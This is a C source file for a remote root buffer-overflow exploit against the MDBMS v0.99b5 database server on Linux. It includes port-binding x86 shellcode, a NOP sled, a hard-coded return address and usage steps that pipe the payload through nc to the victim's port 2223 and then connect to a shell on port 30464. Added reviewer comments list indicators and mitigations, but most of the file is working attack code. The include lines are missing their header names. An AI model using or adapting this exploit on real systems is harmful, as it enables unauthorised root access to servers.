/*
 * Since this has gone public, heres my version....
 *
 * Remote root MDBMS exploit for linux
 * by diab
 *
 * Tested against MDBMS v0.99b5 on a Redhat 6.0 box
 * To obtain MDBMS: http://linux.davecentral.com/892_dataclients.html
 *
 * Usage: Step 1: (./mdbms-exp offset ; cat) | nc victim 2223
 *        Step 2: telnet victim 30464 (should be in a interactive shell)
 *
 * *NOTE*: The MDBMS server crashes once the exploit is sent, so you
 *         really only have one chance until the admin restarts the
 *         server, which could be on the next reboot or whatever.
 *
 * Reviewer notes (defensive reading of this listing):
 *  - Bug class: the program writes one oversized "\h <argument>" line to
 *    stdout for delivery to the MDBMS listener on TCP 2223. The vulnerable
 *    server code is not shown here; presumably the argument overruns a
 *    fixed-size stack buffer in the server's command handling.
 *  - Observable indicators, all taken from this page: an inbound line on
 *    TCP 2223 starting with "\h " followed by roughly BUFLEN bytes that
 *    contain a long run of 0x90; the MDBMS process crashing right after;
 *    a new listener on TCP 30464 on the server host.
 *  - The return address is a hard-coded stack address adjusted by a
 *    guessed offset, so the technique depends on a predictable and
 *    executable stack. Address-space randomisation and a non-executable
 *    stack are the generic mitigations for that dependency.
 *  - The title says "remote root", which implies the server was running
 *    as root. Running the service unprivileged and filtering access to
 *    port 2223 limit the impact. The page does not name a fixed MDBMS
 *    version.
 */

/*
 * NOTE(review): the header names after each #include were lost when this
 * page was extracted, so the listing does not compile as shown.
 */
#include
#include
#include
#include

/* Total size of the buffer that is sent as the "\h" argument. */
#define BUFLEN 1000
/* x86 single-byte no-op opcode, used as filler in front of the payload. */
#define NOP 0x90
/* Base guess for the overwritten return address; argv[1] is added to it. */
#define RET 0xbfffd278

/* port binding shellcode stolen from Taeho Oh's tutorial */
/* props to him 8) */
/*
 * Opaque x86 machine code, used only as a byte string below. Per the header
 * comment the resulting shell is reached on TCP 30464.
 */
char shellcode[]=
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
"\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
"\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
"\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
"\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
"\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
"\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
"\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
"\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
"\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

/*
 * Builds the request buffer and writes it to stdout as a single "\h" line.
 *
 * argv[1], when present, is parsed with atoi() as a signed offset that is
 * added to RET; with no argument the offset is 0.
 *
 * Buffer layout as built below: bytes 0..299 hold the repeated address,
 * then NOP filler, then the shellcode, then repeated address again for the
 * remaining bytes (about the last 100).
 */
int main (int argc, char *argv[])
{
char buf[BUFLEN];
int i, offset;
long addr;

if(argc>1)
offset = atoi(argv[1]);
else
offset = 0;

addr = RET + offset;

/*
 * Fill the whole buffer with the candidate address, one long store every
 * 4 bytes. NOTE(review): the 4-byte stride assumes a 32-bit long, so this
 * is 32-bit x86 Linux code.
 */
for (i = 0; i < BUFLEN; i += 4)
*(long *) &buf[i] = addr;

/* Overwrite the middle with NOP filler, keeping the first 300 bytes and a tail. */
for (i = 300; i < (BUFLEN - strlen (shellcode) - 100); i++)
*(buf + i) = NOP;

/* greets: #hpaus, #ozsecurity, #x25 */

/* Diagnostics go to stderr, so they stay out of the data piped on stdout. */
fprintf(stderr,"\nUsing address 0x%lx\n\n", addr);

/* i is left at the end of the NOP run, so the shellcode follows it directly. */
memcpy (buf + i, shellcode, strlen (shellcode));

/* One-second pause before the request is written; the reason is not stated. */
sleep(1);

/* The request itself: backslash-h, a space, the buffer, then CRLF. */
printf("\\h %s\r\n", buf);

return;
}